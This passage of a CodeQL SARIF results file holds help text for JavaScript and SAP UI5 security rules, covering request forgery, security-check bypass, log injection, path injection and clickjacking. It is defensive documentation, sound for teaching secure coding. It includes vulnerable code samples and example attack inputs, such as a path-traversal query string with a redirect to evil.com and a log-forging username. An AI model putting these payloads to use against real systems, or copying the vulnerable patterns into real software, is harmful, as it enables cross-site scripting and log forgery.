data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + Number(query.get('message_id'));\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n","markdown":"# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + query.get('message_id');\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + Number(query.get('message_id'));\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n"},"properties":{"tags":["security","external/cwe/cwe-918"],"description":"Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n              against the client.","id":"js/client-side-request-forgery","kind":"path-problem","name":"Client-side request forgery","precision":"medium","problem.severity":"error","security-severity":"5.0"}},{"id":"js/user-controlled-bypass","name":"js/user-controlled-bypass","shortDescription":{"text":"User-controlled bypass of security check"},"fullDescription":{"text":"Conditions that the user controls are not suited for making security-related decisions."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.cookies.loggedInUserId !== req.params.userId) {\n        // BAD: login decision made based on user controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.signedCookies.loggedInUserId !== req.params.userId) {\n        // GOOD: login decision made based on server controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n","markdown":"# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.cookies.loggedInUserId !== req.params.userId) {\n        // BAD: login decision made based on user controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.signedCookies.loggedInUserId !== req.params.userId) {\n        // GOOD: login decision made based on server controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n"},"properties":{"tags":["security","external/cwe/cwe-807","external/cwe/cwe-290"],"description":"Conditions that the user controls are not suited for making security-related decisions.","id":"js/user-controlled-bypass","kind":"path-problem","name":"User-controlled bypass of security check","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/log-injection","name":"js/log-injection","shortDescription":{"text":"Log injection"},"fullDescription":{"text":"Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    // GOOD: remove newlines from user controlled input before logging\n    let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n    console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n","markdown":"# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    // GOOD: remove newlines from user controlled input before logging\n    let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n    console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n"},"properties":{"tags":["security","external/cwe/cwe-117"],"description":"Building log entries from user-controlled sources is vulnerable to\n              insertion of forged log entries by a malicious user.","id":"js/log-injection","kind":"path-problem","name":"Log injection","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/summary/lines-of-user-code","name":"js/summary/lines-of-user-code","shortDescription":{"text":"Total lines of user written JavaScript and TypeScript code in the database"},"fullDescription":{"text":"The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["summary","lines-of-code","debug"],"description":"The total number of lines of JavaScript and TypeScript code from the source code directory,\n   excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n   whitespace or comments.","id":"js/summary/lines-of-user-code","kind":"metric","name":"Total lines of user written JavaScript and TypeScript code in the database"}},{"id":"js/summary/lines-of-code","name":"js/summary/lines-of-code","shortDescription":{"text":"Total lines of JavaScript and TypeScript code in the database"},"fullDescription":{"text":"The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["summary","telemetry"],"description":"The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.","id":"js/summary/lines-of-code","kind":"metric","name":"Total lines of JavaScript and TypeScript code in the database"}}],"locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"codeql/javascript-all","semanticVersion":"2.6.18+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/javascript-all/2.6.18/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/javascript-all/2.6.18/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"codeql/threat-models","semanticVersion":"1.0.38+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/threat-models/1.0.38/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/threat-models/1.0.38/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-ui5-queries","semanticVersion":"2.3.0+4627b48907d3149838f214e246d09f1605391fcb","rules":[{"id":"js/ui5-path-injection","name":"js/ui5-path-injection","shortDescription":{"text":"UI5 Path Injection"},"fullDescription":{"text":"Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n    \"sap/ui/dom/includeScript\"\n  ],\n  function(includeScript) {\n    includeScript(\"http://some.vulnerable.domain/some-script.js\");\n  }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n   \"sap/ui/core/mvc/Controller\",\n   \"sap/ui/core/util/File\"\n  ],\n  function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function() {\n        let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n        this.getView().setModel(oDataV2Model);\n      },\n      \n      onSomeEvent: function() {\n        let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n        File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n      }\n    });\n  });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n","markdown":"# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n    \"sap/ui/dom/includeScript\"\n  ],\n  function(includeScript) {\n    includeScript(\"http://some.vulnerable.domain/some-script.js\");\n  }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n   \"sap/ui/core/mvc/Controller\",\n   \"sap/ui/core/util/File\"\n  ],\n  function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function() {\n        let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n        this.getView().setModel(oDataV2Model);\n      },\n      \n      onSomeEvent: function() {\n        let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n        File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n      }\n    });\n  });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n"},"properties":{"tags":["security","external/cwe/cwe-022","external/cwe/cwe-035"],"description":"Constructing path from an uncontrolled remote source to be passed\n              to a filesystem API allows for manipulation of the local filesystem.","id":"js/ui5-path-injection","kind":"path-problem","name":"UI5 Path Injection","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/ui5-clickjacking","name":"js/ui5-clickjacking","shortDescription":{"text":"UI5 Clickjacking"},"fullDescription":{"text":"The absence of frame options allows for clickjacking."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n  frameOptions: \"deny\",\n  ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n<script src=\"resources/sap-ui-core.js\" data-sap-ui-frameOptions=\"deny\"></script>\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    ...\n    <script>\n      window[\"sap-ui-config\"] = {\n        frameOptions: \"allow\",  // either through JS\n        ...\n      };\n    </script>\n\n    <script\n      src=\"resources/sap-ui-core.js\"\n      data-sap-ui-frameOptions=\"allow\"  // or through this HTML attribute\n    ></script>\n  </head>\n  ...\n</html>\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n","markdown":"# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n  frameOptions: \"deny\",\n  ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n<script src=\"resources/sap-ui-core.js\" data-sap-ui-frameOptions=\"deny\"></script>\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    ...\n    <script>\n      window[\"sap-ui-config\"] = {\n        frameOptions: \"allow\",  // either through JS\n        ...\n      };\n    </script>\n\n    <script\n      src=\"resources/sap-ui-core.js\"\n      data-sap-ui-frameOptions=\"allow\"  // or through this HTML attribute\n    ></script>\n  </head>\n  ...\n</html>\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n"},"properties":{"tags":["security","external/cwe/cwe-451"],"description":"The absence of frame options allows for clickjacking.","id":"js/ui5-clickjacking","kind":"problem","name":"UI5 Clickjacking","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/ui5-log-injection-to-http","name":"js/ui5-log-injection-to-http","shortDescription":{"text":"UI5 Log injection in outbound network request"},"fullDescription":{"text":"Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# UI5 Log injection in outbound network request\n\nSending user-controlled log data to a remote URL without further validation may lead to uncontrolled information exposure and to injection vulnerabilities. It may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where log entries from user input are forwarded to a remote URL. \n\n## Recommendation\n\nAvoid processing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component sends log entries to a remote URL without further validation.\n```javascript\nconst http = new XMLHttpRequest();\nconst url = \"https://some.remote.server/location\";\nhttp.open(\"POST\", url);\nhttp.send(Log.getLogEntries()[0].message); // log entry is forwarded to a remote URL\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n","markdown":"# UI5 Log injection in outbound network request\n\nSending user-controlled log data to a remote URL without further validation may lead to uncontrolled information exposure and to injection vulnerabilities. It may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where log entries from user input are forwarded to a remote URL. \n\n## Recommendation\n\nAvoid processing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component sends log entries to a remote URL without further validation.\n```javascript\nconst http = new XMLHttpRequest();\nconst url = \"https://some.remote.server/location\";\nhttp.open(\"POST\", url);\nhttp.send(Log.getLogEntries()[0].message); // log entry is forwarded to a remote URL\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n"},"properties":{"tags":["security","external/cwe/cwe-117"],"description":"Building log entries from user-controlled sources is vulnerable to\n              insertion of forged log entries by a malicious user.","id":"js/ui5-log-injection-to-http","kind":"path-problem","name":"UI5 Log injection in outbound network request","precision":"medium","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/ui5-unsafe-log-access","name":"js/ui5-unsafe-log-access","shortDescription":{"text":"Access to user-controlled UI5 Logs"},"fullDescription":{"text":"Log entries from user-controlled sources should not be further processed."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Access to user-controlled UI5 Logs\n\nProcessing user-controlled log entries can lead to injection vulnerabilities, where an attacker can manipulate user input to affect the application excution.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where user-controlled log entries are accessed in a UI5 application. \n\n## Recommendation\n\nAvoid accessing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component retrieves log entries to further process them.\n```javascript\nlet message = Log.getLogEntries()[0].message; //access to user controlled logs\ndo_smth(message);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace 